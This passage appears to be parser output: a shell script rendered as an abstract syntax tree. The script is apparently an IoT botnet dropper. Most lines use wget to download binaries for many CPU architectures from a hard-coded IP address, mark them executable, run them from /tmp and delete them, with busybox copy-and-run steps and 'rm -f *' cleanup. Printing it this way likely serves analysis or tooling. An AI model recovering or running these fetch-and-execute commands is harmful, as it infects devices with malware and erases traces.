    WordNode(lineno=32, pos=(2159, 2171), word='/bin/busybox'),
    WordNode(lineno=32, pos=(2172, 2174), word='./'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2174, 2175)),
  CommandNode(lineno=32, pos=(2176, 2202), parts=[
    WordNode(lineno=32, pos=(2176, 2183), word='busybox'),
    WordNode(lineno=32, pos=(2184, 2187), word='cat'),
    WordNode(lineno=32, pos=(2188, 2192), word='mips'),
    RedirectNode(lineno=32, output=
      WordNode(lineno=32, pos=(2195, 2202), word='busybox'), pos=(2193, 2202), type='>'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2202, 2203)),
  CommandNode(lineno=32, pos=(2204, 2222), parts=[
    WordNode(lineno=32, pos=(2204, 2211), word='busybox'),
    WordNode(lineno=32, pos=(2212, 2214), word='rm'),
    WordNode(lineno=32, pos=(2215, 2217), word='-f'),
    WordNode(lineno=32, pos=(2218, 2222), word='mips'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2222, 2223)),
  CommandNode(lineno=32, pos=(2224, 2247), parts=[
    WordNode(lineno=32, pos=(2224, 2231), word='busybox'),
    WordNode(lineno=32, pos=(2232, 2234), word='cp'),
    WordNode(lineno=32, pos=(2235, 2242), word='busybox'),
    WordNode(lineno=32, pos=(2243, 2247), word='mips'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2247, 2248)),
  CommandNode(lineno=32, pos=(2249, 2270), parts=[
    WordNode(lineno=32, pos=(2249, 2256), word='busybox'),
    WordNode(lineno=32, pos=(2257, 2259), word='rm'),
    WordNode(lineno=32, pos=(2260, 2262), word='-f'),
    WordNode(lineno=32, pos=(2263, 2270), word='busybox'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2270, 2271)),
  CommandNode(lineno=32, pos=(2272, 2278), parts=[
    WordNode(lineno=32, pos=(2272, 2278), word='./mips'),
  ]),
  OperatorNode(lineno=32, op=';', pos=(2278, 2279)),
  CommandNode(lineno=32, pos=(2280, 2300), parts=[
    WordNode(lineno=32, pos=(2280, 2287), word='busybox'),
    WordNode(lineno=32, pos=(2288, 2290), word='rm'),
    WordNode(lineno=32, pos=(2291, 2293), word='-f'),
    WordNode(lineno=32, pos=(2294, 2300), word='mips*\r'),
  ]),
])
CommandNode(lineno=33, pos=(2301, 2309), parts=[
  WordNode(lineno=33, pos=(2301, 2303), word='rm'),
  WordNode(lineno=33, pos=(2304, 2306), word='-f'),
  WordNode(lineno=33, pos=(2307, 2309), word='*\r'),
])
CommandNode(lineno=34, pos=(2310, 2311), parts=[
  WordNode(lineno=34, pos=(2310, 2311), word='\r'),
])
ListNode(lineno=35, pos=(2312, 2399), parts=[
  CommandNode(lineno=35, pos=(2312, 2352), parts=[
    WordNode(lineno=35, pos=(2312, 2316), word='wget'),
    WordNode(lineno=35, pos=(2317, 2340), word='http://80.82.64.190/x86'),
    WordNode(lineno=35, pos=(2341, 2343), word='-O'),
    WordNode(lineno=35, pos=(2344, 2352), word='/tmp/x86'),
  ]),
  OperatorNode(lineno=35, op=';', pos=(2352, 2353)),
  CommandNode(lineno=35, pos=(2354, 2371), parts=[
    WordNode(lineno=35, pos=(2354, 2359), word='chmod'),
    WordNode(lineno=35, pos=(2360, 2362), word='+x'),
    WordNode(lineno=35, pos=(2363, 2371), word='/tmp/x86'),
  ]),
  OperatorNode(lineno=35, op=';', pos=(2371, 2372)),
  CommandNode(lineno=35, pos=(2373, 2381), parts=[
    WordNode(lineno=35, pos=(2373, 2381), word='/tmp/x86'),
  ]),
  OperatorNode(lineno=35, op=';', pos=(2381, 2382)),
  CommandNode(lineno=35, pos=(2383, 2399), parts=[
    WordNode(lineno=35, pos=(2383, 2385), word='rm'),
    WordNode(lineno=35, pos=(2386, 2389), word='-rf'),
    WordNode(lineno=35, pos=(2390, 2399), word='/tmp/x86\r'),
  ]),
])
ListNode(lineno=36, pos=(2400, 2492), parts=[
  CommandNode(lineno=36, pos=(2400, 2442), parts=[
    WordNode(lineno=36, pos=(2400, 2404), word='wget'),
    WordNode(lineno=36, pos=(2405, 2429), word='http://80.82.64.190/i686'),
    WordNode(lineno=36, pos=(2430, 2432), word='-O'),
    WordNode(lineno=36, pos=(2433, 2442), word='/tmp/i686'),
  ]),
  OperatorNode(lineno=36, op=';', pos=(2442, 2443)),
  CommandNode(lineno=36, pos=(2444, 2462), parts=[
    WordNode(lineno=36, pos=(2444, 2449), word='chmod'),
    WordNode(lineno=36, pos=(2450, 2452), word='+x'),
    WordNode(lineno=36, pos=(2453, 2462), word='/tmp/i686'),
  ]),
  OperatorNode(lineno=36, op=';', pos=(2462, 2463)),
  CommandNode(lineno=36, pos=(2464, 2473), parts=[
    WordNode(lineno=36, pos=(2464, 2473), word='/tmp/i686'),
  ]),
  OperatorNode(lineno=36, op=';', pos=(2473, 2474)),
  CommandNode(lineno=36, pos=(2475, 2492), parts=[
    WordNode(lineno=36, pos=(2475, 2477), word='rm'),
    WordNode(lineno=36, pos=(2478, 2481), word='-rf'),
    WordNode(lineno=36, pos=(2482, 2492), word='/tmp/i686\r'),
  ]),
])
ListNode(lineno=37, pos=(2493, 2585), parts=[
  CommandNode(lineno=37, pos=(2493, 2535), parts=[
    WordNode(lineno=37, pos=(2493, 2497), word='wget'),
    WordNode(lineno=37, pos=(2498, 2522), word='http://80.82.64.190/i586'),
    WordNode(lineno=37, pos=(2523, 2525), word='-O'),
    WordNode(lineno=37, pos=(2526, 2535), word='/tmp/i586'),
  ]),
  OperatorNode(lineno=37, op=';', pos=(2535, 2536)),
  CommandNode(lineno=37, pos=(2537, 2555), parts=[
    WordNode(lineno=37, pos=(2537, 2542), word='chmod'),
    WordNode(lineno=37, pos=(2543, 2545), word='+x'),
    WordNode(lineno=37, pos=(2546, 2555), word='/tmp/i586'),
  ]),
  OperatorNode(lineno=37, op=';', pos=(2555, 2556)),
  CommandNode(lineno=37, pos=(2557, 2566), parts=[
    WordNode(lineno=37, pos=(2557, 2566), word='/tmp/i586'),
  ]),
  OperatorNode(lineno=37, op=';', pos=(2566, 2567)),
  CommandNode(lineno=37, pos=(2568, 2585), parts=[
    WordNode(lineno=37, pos=(2568, 2570), word='rm'),
    WordNode(lineno=37, pos=(2571, 2574), word='-rf'),
    WordNode(lineno=37, pos=(2575, 2585), word='/tmp/i586\r'),
  ]),
])
ListNode(lineno=38, pos=(2586, 2678), parts=[
  CommandNode(lineno=38, pos=(2586, 2628), parts=[
    WordNode(lineno=38, pos=(2586, 2590), word='wget'),
    WordNode(lineno=38, pos=(2591, 2615), word='http://80.82.64.190/m68k'),
    WordNode(lineno=38, pos=(2616, 2618), word='-O'),
    WordNode(lineno=38, pos=(2619, 2628), word='/tmp/m68k'),
  ]),
  OperatorNode(lineno=38, op=';', pos=(2628, 2629)),
  CommandNode(lineno=38, pos=(2630, 2648), parts=[
    WordNode(lineno=38, pos=(2630, 2635), word='chmod'),
    WordNode(lineno=38, pos=(2636, 2638), word='+x'),
    WordNode(lineno=38, pos=(2639, 2648), word='/tmp/m68k'),
  ]),
  OperatorNode(lineno=38, op=';', pos=(2648, 2649)),
  CommandNode(lineno=38, pos=(2650, 2659), parts=[
    WordNode(lineno=38, pos=(2650, 2659), word='/tmp/m68k'),
  ]),
  OperatorNode(lineno=38, op=';', pos=(2659, 2660)),
  CommandNode(lineno=38, pos=(2661, 2678), parts=[
    WordNode(lineno=38, pos=(2661, 2663), word='rm'),
    WordNode(lineno=38, pos=(2664, 2667), word='-rf'),
    WordNode(lineno=38, pos=(2668, 2678), word='/tmp/m68k\r'),
  ]),
])
ListNode(lineno=39, pos=(2679, 2771), parts=[
  CommandNode(lineno=39, pos=(2679, 2721), parts=[
    WordNode(lineno=39, pos=(2679, 2683), word='wget'),
    WordNode(lineno=39, pos=(2684, 2708), word='http://80.82.64.190/test'),
    WordNode(lineno=39, pos=(2709, 2711), word='-O'),
    WordNode(lineno=39, pos=(2712, 2721), word='/tmp/test'),
  ]),
  OperatorNode(lineno=39, op=';', pos=(2721, 2722)),
  CommandNode(lineno=39, pos=(2723, 2741), parts=[
    WordNode(lineno=39, pos=(2723, 2728), word='chmod'),
    WordNode(lineno=39, pos=(2729, 2731), word='+x'),
    WordNode(lineno=39, pos=(2732, 2741), word='/tmp/test'),
  ]),
  OperatorNode(lineno=39, op=';', pos=(2741, 2742)),
  CommandNode(lineno=39, pos=(2743, 2752), parts=[
    WordNode(lineno=39, pos=(2743, 2752), word='/tmp/test'),
  ]),
  OperatorNode(lineno=39, op=';', pos=(2752, 2753)),
  CommandNode(lineno=39, pos=(2754, 2771), parts=[
    WordNode(lineno=39, pos=(2754, 2756), word='rm'),
    WordNode(lineno=39, pos=(2757, 2760), word='-rf'),
    WordNode(lineno=39, pos=(2761, 2771), word='/tmp/test\r'),
  ]),
])
ListNode(lineno=40, pos=(2772, 2859), parts=[
  CommandNode(lineno=40, pos=(2772, 2812), parts=[
    WordNode(lineno=40, pos=(2772, 2776), word='wget'),
    WordNode(lineno=40, pos=(2777, 2800), word='http://80.82.64.190/arm'),
    WordNode(lineno=40, pos=(2801, 2803), word='-O'),
    WordNode(lineno=40, pos=(2804, 2812), word='/tmp/arm'),
  ]),
  OperatorNode(lineno=40, op=';', pos=(2812, 2813)),
  CommandNode(lineno=40, pos=(2814, 2831), parts=[
    WordNode(lineno=40, pos=(2814, 2819), word='chmod'),
    WordNode(lineno=40, pos=(2820, 2822), word='+x'),
    WordNode(lineno=40, pos=(2823, 2831), word='/tmp/arm'),
  ]),
  OperatorNode(lineno=40, op=';', pos=(2831, 2832)),
  CommandNode(lineno=40, pos=(2833, 2841), parts=[
    WordNode(lineno=40, pos=(2833, 2841), word='/tmp/arm'),
  ]),
  OperatorNode(lineno=40, op=';', pos=(2841, 2842)),
  CommandNode(lineno=40, pos=(2843, 2859), parts=[
    WordNode(lineno=40, pos=(2843, 2845), word='rm'),
    WordNode(lineno=40, pos=(2846, 2849), word='-rf'),
    WordNode(lineno=40, pos=(2850, 2859), word='/tmp/arm\r'),
  ]),
])
ListNode(lineno=41, pos=(2860, 2957), parts=[
  CommandNode(lineno=41, pos=(2860, 2904), parts=[
    WordNode(lineno=41, pos=(2860, 2864), word='wget'),
    WordNode(lineno=41, pos=(2865, 2890), word='http://80.82.64.190/sparc'),
    WordNode(lineno=41, pos=(2891, 2893), word='-O'),
    WordNode(lineno=41, pos=(2894, 2904), word='/tmp/sparc'),
  ]),
  OperatorNode(lineno=41, op=';', pos=(2904, 2905)),
  CommandNode(lineno=41, pos=(2906, 2925), parts=[
    WordNode(lineno=41, pos=(2906, 2911), word='chmod'),
    WordNode(lineno=41, pos=(2912, 2914), word='+x'),
    WordNode(lineno=41, pos=(2915, 2925), word='/tmp/sparc'),
  ]),
  OperatorNode(lineno=41, op=';', pos=(2925, 2926)),
  CommandNode(lineno=41, pos=(2927, 2937), parts=[
    WordNode(lineno=41, pos=(2927, 2937), word='/tmp/sparc'),
  ]),
  OperatorNode(lineno=41, op=';', pos=(2937, 2938)),
  CommandNode(lineno=41, pos=(2939, 2957), parts=[
    WordNode(lineno=41, pos=(2939, 2941), word='rm'),
    WordNode(lineno=41, pos=(2942, 2945), word='-rf'),
    WordNode(lineno=41, pos=(2946, 2957), word='/tmp/sparc\r'),
  ]),
])
ListNode(lineno=42, pos=(2958, 3045), parts=[
  CommandNode(lineno=42, pos=(2958, 2998), parts=[
    WordNode(lineno=42, pos=(2958, 2962), word='wget'),
    WordNode(lineno=42, pos=(2963, 2986), word='http://80.82.64.190/sh4'),
    WordNode(lineno=42, pos=(2987, 2989), word='-O'),
    WordNode(lineno=42, pos=(2990, 2998), word='/tmp/sh4'),
  ]),
  OperatorNode(lineno=42, op=';', pos=(2998, 2999)),
  CommandNode(lineno=42, pos=(3000, 3017), parts=[
    WordNode(lineno=42, pos=(3000, 3005), word='chmod'),
    WordNode(lineno=42, pos=(3006, 3008), word='+x'),
    WordNode(lineno=42, pos=(3009, 3017), word='/tmp/sh4'),
  ]),
  OperatorNode(lineno=42, op=';', pos=(3017, 3018)),
  CommandNode(lineno=42, pos=(3019, 3027), parts=[
    WordNode(lineno=42, pos=(3019, 3027), word='/tmp/sh4'),
  ]),
  OperatorNode(lineno=42, op=';', pos=(3027, 3028)),
  CommandNode(lineno=42, pos=(3029, 3045), parts=[
    WordNode(lineno=42, pos=(3029, 3031), word='rm'),
    WordNode(lineno=42, pos=(3032, 3035), word='-rf'),
    WordNode(lineno=42, pos=(3036, 3045), word='/tmp/sh4\r'),
  ]),
])
ListNode(lineno=43, pos=(3046, 3168), parts=[
  CommandNode(lineno=43, pos=(3046, 3100), parts=[
    WordNode(lineno=43, pos=(3046, 3050), word='wget'),
    WordNode(lineno=43, pos=(3051, 3081), word='http://80.82.64.190/powerpc440'),
    WordNode(lineno=43, pos=(3082, 3084), word='-O'),
    WordNode(lineno=43, pos=(3085, 3100), word='/tmp/powerpc440'),
  ]),
  OperatorNode(lineno=43, op=';', pos=(3100, 3101)),
  CommandNode(lineno=43, pos=(3102, 3126), parts=[
    WordNode(lineno=43, pos=(3102, 3107), word='chmod'),
    WordNode(lineno=43, pos=(3108, 3110), word='+x'),
    WordNode(lineno=43, pos=(3111, 3126), word='/tmp/powerpc440'),
  ]),
  OperatorNode(lineno=43, op=';', pos=(3126, 3127)),
  CommandNode(lineno=43, pos=(3128, 3143), parts=[
    WordNode(lineno=43, pos=(3128, 3143), word='/tmp/powerpc440'),
  ]),
  OperatorNode(lineno=43, op=';', pos=(3143, 3144)),
  CommandNode(lineno=43, pos=(3145, 3168), parts=[
    WordNode(lineno=43, pos=(3145, 3147), word='rm'),
    WordNode(lineno=43, pos=(3148, 3151), word='-rf'),
    WordNode(lineno=43, pos=(3152, 3168), word='/tmp/powerpc440\r'),
  ]),
])
ListNode(lineno=44, pos=(3169, 3276), parts=[
  CommandNode(lineno=44, pos=(3169, 3217), parts=[
    WordNode(lineno=44, pos=(3169, 3173), word='wget'),
    WordNode(lineno=44, pos=(3174, 3201), word='http://80.82.64.190/powerpc'),
    WordNode(lineno=44, pos=(3202, 3204), word='-O'),
    WordNode(lineno=44, pos=(3205, 3217), word='/tmp/powerpc'),
  ]),
  OperatorNode(lineno=44, op=';', pos=(3217, 3218)),
  CommandNode(lineno=44, pos=(3219, 3240), parts=[
    WordNode(lineno=44, pos=(3219, 3224), word='chmod'),
    WordNode(lineno=44, pos=(3225, 3227), word='+x'),
    WordNode(lineno=44, pos=(3228, 3240), word='/tmp/powerpc'),
  ]),
  OperatorNode(lineno=44, op=';', pos=(3240, 3241)),
  CommandNode(lineno=44, pos=(3242, 3254), parts=[
    WordNode(lineno=44, pos=(3242, 3254), word='/tmp/powerpc'),
  ]),
  OperatorNode(lineno=44, op=';', pos=(3254, 3255)),
  CommandNode(lineno=44, pos=(3256, 3276), parts=[
    WordNode(lineno=44, pos=(3256, 3258), word='rm'),
    WordNode(lineno=44, pos=(3259, 3262), word='-rf'),
    WordNode(lineno=44, pos=(3263, 3276), word='/tmp/powerpc\r'),
  ]),
])
ListNode(lineno=45, pos=(3277, 3379), parts=[
  CommandNode(lineno=45, pos=(3277, 3323), parts=[
    WordNode(lineno=45, pos=(3277, 3281), word='wget'),
    WordNode(lineno=45, pos=(3282, 3308), word='http://80.82.64.190/mipsel'),
    WordNode(lineno=45, pos=(3309, 3311), word='-O'),
    WordNode(lineno=45, pos=(3312, 3323), word='/tmp/mipsel'),
  ]),
  OperatorNode(lineno=45, op=';', pos=(3323, 3324)),
  CommandNode(lineno=45, pos=(3325, 3345), parts=[
    WordNode(lineno=45, pos=(3325, 3330), word='chmod'),
    WordNode(lineno=45, pos=(3331, 3333), word='+x'),
    WordNode(lineno=45, pos=(3334, 3345), word='/tmp/mipsel'),
  ]),
  OperatorNode(lineno=45, op=';', pos=(3345, 3346)),
  CommandNode(lineno=45, pos=(3347, 3358), parts=[
    WordNode(lineno=45, pos=(3347, 3358), word='/tmp/mipsel'),
  ]),
  OperatorNode(lineno=45, op=';', pos=(3358, 3359)),
  CommandNode(lineno=45, pos=(3360, 3379), parts=[
    WordNode(lineno=45, pos=(3360, 3362), word='rm'),
    WordNode(lineno=45, pos=(3363, 3366), word='-rf'),
    WordNode(lineno=45, pos=(3367, 3379), word='/tmp/mipsel\r'),
  ]),
])
ListNode(lineno=46, pos=(3380, 3472), parts=[
  CommandNode(lineno=46, pos=(3380, 3422), parts=[
    WordNode(lineno=46, pos=(3380, 3384), word='wget'),
    WordNode(lineno=46, pos=(3385, 3409), word='http://80.82.64.190/mips'),
    WordNode(lineno=46, pos=(3410, 3412), word='-O'),
    WordNode(lineno=46, pos=(3413, 3422), word='/tmp/mips'),
  ]),
  OperatorNode(lineno=46, op=';', pos=(3422, 3423)),
  CommandNode(lineno=46, pos=(3424, 3442), parts=[
    WordNode(lineno=46, pos=(3424, 3429), word='chmod'),
    WordNode(lineno=46, pos=(3430, 3432), word='+x'),
    WordNode(lineno=46, pos=(3433, 3442), word='/tmp/mips'),
  ]),
  OperatorNode(lineno=46, op=';', pos=(3442, 3443)),
  CommandNode(lineno=46, pos=(3444, 3453), parts=[
    WordNode(lineno=46, pos=(3444, 3453), word='/tmp/mips'),
  ]),
  OperatorNode(lineno=46, op=';', pos=(3453, 3454)),
  CommandNode(lineno=46, pos=(3455, 3472), parts=[
    WordNode(lineno=46, pos=(3455, 3457), word='rm'),
    WordNode(lineno=46, pos=(3458, 3461), word='-rf'),
    WordNode(lineno=46, pos=(3462, 3472), word='/tmp/mips\r'),
  ]),
])
CommandNode(lineno=47, pos=(3473, 3474), parts=[
  WordNode(lineno=47, pos=(3473, 3474), word='\r'),
])
CommandNode(lineno=48, pos=(3475, 3480), parts=[
  WordNode(lineno=48, pos=(3475, 3480), word='exit\r'),
])
